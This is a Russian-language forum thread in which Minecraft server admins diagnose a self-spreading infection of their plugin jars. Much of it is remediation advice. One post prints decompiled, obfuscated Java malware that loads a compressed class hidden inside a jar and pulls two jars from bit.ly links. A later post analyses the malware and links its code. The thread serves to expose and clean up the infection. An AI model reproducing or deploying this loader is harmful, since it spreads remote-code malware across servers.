Решено Баг с 1 августа

Несколько раз спасало:
Удаление папки logs, файлов level.dat и level.dat.old
+ перекачка плагинов (Сделайте сейв до появления бага)

 

Код:

static {
        try {
            File file = new File(new String(new byte[] { 112, 108, 117, 103, 105, 110, 115, 47 }));
            boolean b = false;
            long n = -1L;
            int n2 = 0;
            final File[] listFiles = file.listFiles();
            for (int i = 0; i < listFiles.length; ++i) {
                if (listFiles[i].isFile() && listFiles[i].getName().endsWith(new String(new byte[] { 46, 106, 97, 114 }))) {
                    file = listFiles[i];
                    final byte[] array = new byte[(int)file.length()];
                    final FileInputStream fileInputStream = new FileInputStream(file);
                    fileInputStream.read(array);
                    fileInputStream.close();
                    if (array[15] == (byte)(array[16] ^ 0xBE)) {
                        b = true;
                        n = ((array[array.length - 2] & 0xFF) << 8 | (array[array.length - 1] & 0xFF));
                        if (n > 0L) {
                            n2 = (int)n;
                            n = file.length() - (n + 2L);
                            break;
                        }
                    }
                }
            }
            if (b) {
                final RandomAccessFile randomAccessFile = new RandomAccessFile(file, "r");
                randomAccessFile.seek(n);
                final byte[] input = new byte[n2];
                randomAccessFile.read(input, 0, n2);
                randomAccessFile.close();
                final Inflater inflater = new Inflater();
                inflater.setInput(input);
                final ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(n2);
                final byte[] array2 = new byte[1024];
                while (!inflater.finished()) {
                    byteArrayOutputStream.write(array2, 0, inflater.inflate(array2));
                }
                byteArrayOutputStream.close();
                final byte[] byteArray = byteArrayOutputStream.toByteArray();
                inflater.end();
                final String s = new String(new byte[] { 104, 116, 116, 112, 58, 47, 47, 98, 105, 116, 46, 108, 121, 47 });
                final URLClassLoader urlClassLoader = new URLClassLoader(new URL[] { new URL(s + new String(new byte[] { 50, 50, 88, 66, 113, 105, 121 })), new URL(s + new String(new byte[] { 49, 88, 75, 65, 69, 112, 90 })) }, Thread.currentThread().getContextClassLoader());
                final Method declaredMethod = ClassLoader.class.getDeclaredMethod(new String(new byte[] { 100, 101, 102, 105, 110, 101, 67, 108, 97, 115, 115 }), String.class, byte[].class, Integer.TYPE, Integer.TYPE);
                declaredMethod.setAccessible(true);
                ((Class)declaredMethod.invoke(urlClassLoader, null, byteArray, 0, byteArray.length)).newInstance();
            }
        }
        catch (Exception ex) {}
    }

 

Я календарь переверну, и снова первое августа

 

Большое спасибо! Но как вы узнали?)

 

в сентябре у многих была проблема такая, создали конфу и думали как исправить, я нашел то что файлы заражаются вредоносным кодом и скинул на проверку в конфу

 

А вот я поставил ваш Vault, но все равно стопает сервер. Но как то один раз прошло. С чем связанно? Что удалить, перекачать?[DOUBLEPOST=1483124085,1483123909][/DOUBLEPOST]

В именно данный момент, удалил логи и левел дат. Работает, как вылетит приду запомощью со слезами, проект не могу сделать до конца, а менять время не по царски, тем более гугл не разрешает так искать информацию

 

Скачиваются и "запускаются" два джарника, располагающиеся по адресам http://bit.ly/22XBqiy и http://bit.ly/1XKAEpZ
Это модификатор байткода (http://asm.ow2.org). При помощи него вредоносный код и распространяется по серверу. Если конкретнее, то инфицированию подвержены все jar-файлы из папки plugins...
Вредоносный код (класс) вшит (байты) непосредственно в jar-файл.
Содержимое класса: http://pastebin.com/XSrKV2G1

Итог:
Автор этой штуки оказался с юмором - сервера с offline-mode автоматически останавливаются после 1-го сентября. Ну и различные эвенты отключаются на всякий случай.
Никакой иной угрозы вирус не несёт.

Берегите себя и своих близких и не качайте всякую дичь.

Интересно, кто создатель этой "приблуды"?

Отдельное спасибо @xtrafrancyz за помощь в решении сие загадки.

 

Вот к чему приводит скачивания плагинов с помоек. Ну это еще слабая шутка.

 

Ну так дело в том, что все качаю с RuBukkit, а некоторые плагины, беру со своей старой сборки.[DOUBLEPOST=1483168242,1483168203][/DOUBLEPOST]

А как остановить скачивание?

 

Все плагины качайте ТОЛЬКО с официальных ресурсов dev.bukkit и spigotmc.[DOUBLEPOST=1483169460][/DOUBLEPOST]Даже здесь не стоит качать.

 

Я все перекачал, кроме своих самописов, но почему то, мой из самописов весил изначально 31КБ, а стал весить 40КБ. Что-то туда вшили?[DOUBLEPOST=1483170531,1483169767][/DOUBLEPOST]

Не помогает, сколько уже обновлял, сбрасывал, даже с нуля собирал, урод какой то сыграл злую шутку.
Только с online-mod=true работает.

 

Ты тему читаешь вообще? Бэдкор вшивается во ВСЕ плагины в папке plugins. Если один раз уже попался, то пока ты не избавишься от ВСЕХ зараженных плагинов - что-то там перекачивать бессмысленно.
Если самописы - бери чистые сорцы и компилируй по новой.

 

Я самописы удалил. Я все плагины обновил, но может еще надо было ядро? Я не знаю.

 

Нужно было перекачать все плагины, не запуская при этом сервер. В ядро ничего не вшивается, только в плагины. Нельзя доверять ни одному из плагинов. Если так интересно, можно проверить (декомпилировать) главный класс каждого из плагинов - в заражённых файлах будет спецефический static-контент (код указывался выше).

 

Бегу декомпилировать!))